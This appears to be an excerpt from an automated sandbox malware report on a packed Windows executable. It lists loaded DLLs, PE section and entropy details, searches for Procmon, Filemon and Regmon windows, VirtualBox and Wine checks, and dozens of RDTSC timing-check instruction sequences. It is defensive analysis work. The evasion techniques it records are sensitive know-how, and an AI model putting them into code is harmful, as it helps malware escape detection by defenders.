                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: LP4a6BowQN.exeStatic file information: File size 2969088 > 1048576
                Source: LP4a6BowQN.exeStatic PE information: Raw size of nxyovwhs is bigger than: 0x100000 < 0x2ace00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeUnpacked PE file: 0.2.LP4a6BowQN.exe.7e0000.0.unpack :EW;.rsrc :W;.idata :W;nxyovwhs:EW;mlwhfqbs:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nxyovwhs:EW;mlwhfqbs:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: LP4a6BowQN.exeStatic PE information: real checksum: 0x2dbbb9 should be: 0x2d6751
                Source: LP4a6BowQN.exeStatic PE information: section name:
                Source: LP4a6BowQN.exeStatic PE information: section name: .rsrc
                Source: LP4a6BowQN.exeStatic PE information: section name: .idata
                Source: LP4a6BowQN.exeStatic PE information: section name: nxyovwhs
                Source: LP4a6BowQN.exeStatic PE information: section name: mlwhfqbs
                Source: LP4a6BowQN.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFB98D push 9800B9C2h; ret 0_3_00BFB999
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFA5EC push eax; ret 0_3_00BFA5ED
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFA8EB push eax; iretd 0_3_00BFA8F1
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFCAE5 pushad ; retf 0_3_00BFCB19
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFC9E2 pushad ; retf 0_3_00BFC9F9
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BFCBD0 pushad ; retf 0_3_00BFCBD9
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00BF9EC1 push edi; retf 0_3_00BF9ED4
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00C1E739 push ebp; iretd 0_3_00C1E73C
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00C1E739 push ebp; iretd 0_3_00C1E73C
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00B8DBD0 pushad ; retf 0_3_00B8DBEA
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00C1E739 push ebp; iretd 0_3_00C1E73C
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeCode function: 0_3_00C1E739 push ebp; iretd 0_3_00C1E73C
                Source: LP4a6BowQN.exeStatic PE information: section name: entropy: 7.980570361572185

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 837D6A second address: 837D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B940F second address: 9B941F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 jnc 00007FC8BCD07016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B86B1 second address: 9B86C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC8BCFEEF06h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B86C7 second address: 9B86EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8BCD07016h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD07029h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B86EC second address: 9B870C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC8BCFEEF06h 0x00000009 jmp 00007FC8BCFEEF11h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B8C8A second address: 9B8CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07023h 0x00000009 jmp 00007FC8BCD07023h 0x0000000e jp 00007FC8BCD0701Eh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B8CC5 second address: 9B8CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB59F second address: 9BB5AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB5AA second address: 9BB5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jl 00007FC8BCFEEF18h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FC8BCFEEF06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB5C0 second address: 9BB5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB691 second address: 9BB6A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB6FB second address: 9BB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1EEDh], esi 0x0000000f push 00000000h 0x00000011 mov di, 6F78h 0x00000015 push 20362766h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d jmp 00007FC8BCD07025h 0x00000022 pop eax 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB72E second address: 9BB739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC8BCFEEF06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB739 second address: 9BB772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 203627E6h 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D38E6h] 0x00000018 push 00000000h 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D2F14h], edi 0x00000022 call 00007FC8BCD07019h 0x00000027 push eax 0x00000028 push edx 0x00000029 jp 00007FC8BCD0701Ch 0x0000002f jg 00007FC8BCD07016h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB772 second address: 9BB778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB778 second address: 9BB77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB77C second address: 9BB7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC8BCFEEF17h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB7A1 second address: 9BB7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB7A5 second address: 9BB7B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB7B6 second address: 9BB7F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCD0702Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC8BCD0702Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB7F8 second address: 9BB81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FC8BCFEEF0Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB81E second address: 9BB823 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB8C6 second address: 9BB920 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC8BCFEEF08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f jmp 00007FC8BCFEEF14h 0x00000034 pop ecx 0x00000035 push 3CF2C074h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB920 second address: 9BB924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB924 second address: 9BB92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9BB92A second address: 9BB992 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07020h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 3CF2C0F4h 0x00000011 stc 0x00000012 push 00000003h 0x00000014 call 00007FC8BCD0701Dh 0x00000019 movzx esi, si 0x0000001c pop edi 0x0000001d jmp 00007FC8BCD0701Dh 0x00000022 push 00000000h 0x00000024 mov dl, 1Bh 0x00000026 push 00000003h 0x00000028 mov dx, 81F6h 0x0000002c push 8B140617h 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 jmp 00007FC8BCD07029h 0x00000039 pop esi 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9CD9F2 second address: 9CD9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9CD9FB second address: 9CDA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DB796 second address: 9DB79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DB79A second address: 9DB7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DB7AA second address: 9DB7B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF0Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DB948 second address: 9DB94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DB94E second address: 9DB953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DBEA3 second address: 9DBEA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DBFC7 second address: 9DBFCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DC430 second address: 9DC467 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC8BCD07023h 0x00000011 pushad 0x00000012 jnc 00007FC8BCD07016h 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FC8BCD07016h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jg 00007FC8BCD07016h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9D19AB second address: 9D19B1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9D19B1 second address: 9D19BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9D19BA second address: 9D19C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9D19C2 second address: 9D19C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9D19C8 second address: 9D19E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC8BCFEEF15h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9AEEB2 second address: 9AEEEA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCD0701Eh 0x00000008 jne 00007FC8BCD0701Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC8BCD07018h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FC8BCD07020h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD0E3 second address: 9DD0E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD0E7 second address: 9DD128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC8BCD0701Ah 0x0000000c jmp 00007FC8BCD07026h 0x00000011 jmp 00007FC8BCD07029h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD3AA second address: 9DD3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD3AE second address: 9DD3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c je 00007FC8BCD07018h 0x00000012 jmp 00007FC8BCD07022h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD3DA second address: 9DD3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9DD3DE second address: 9DD3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07023h 0x00000007 jc 00007FC8BCD07016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
